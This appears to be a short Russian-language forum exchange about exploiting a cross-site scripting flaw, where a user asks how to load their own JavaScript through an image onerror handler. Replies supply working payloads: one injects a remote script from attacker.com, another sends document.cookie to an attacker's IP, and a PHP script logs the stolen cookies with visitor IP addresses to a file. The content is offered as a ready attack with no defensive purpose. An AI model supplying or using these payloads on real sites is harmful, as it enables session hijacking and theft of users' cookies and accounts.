есть xss вида <img src=1 onerror=(alert(1))>
Как сделать ссылку на мой js
<img src=1 onerror=(src='tes.com\js.js')>
Как сделать ссылку на мой js
<img src=1 onerror=(src='tes.com\js.js')>
<img src="1" onerror="s=document.createElement('script');s.src='//attacker.com/evil.js';document.body.appendChild(s)">
<img src=x onerror=this.src='http://IP/?'+document.cookie;>
<?php
if (isset($_GET['cookie']))
{
$text = "New cookie accept from ". $_SERVER['REMOTE_ADDR'] ." at ". date('l jS \of F Y h:i:s A');
$text .= "\n".str_repeat("=", 22) . "\n" . $_GET['cookie']."\n".str_repeat("=", 22)."\n";
$file = fopen("sniff.txt", "a");
fwrite($file, $text);
fclose($file);
}
?>
Как вы сохраняете изменение метода onerror — вам нужен доступ к самому источнику?Вот так, например:
JavaScript:<img src="1" onerror="s=document.createElement('script');s.src='//attacker.com/evil.js';document.body.appendChild(s)">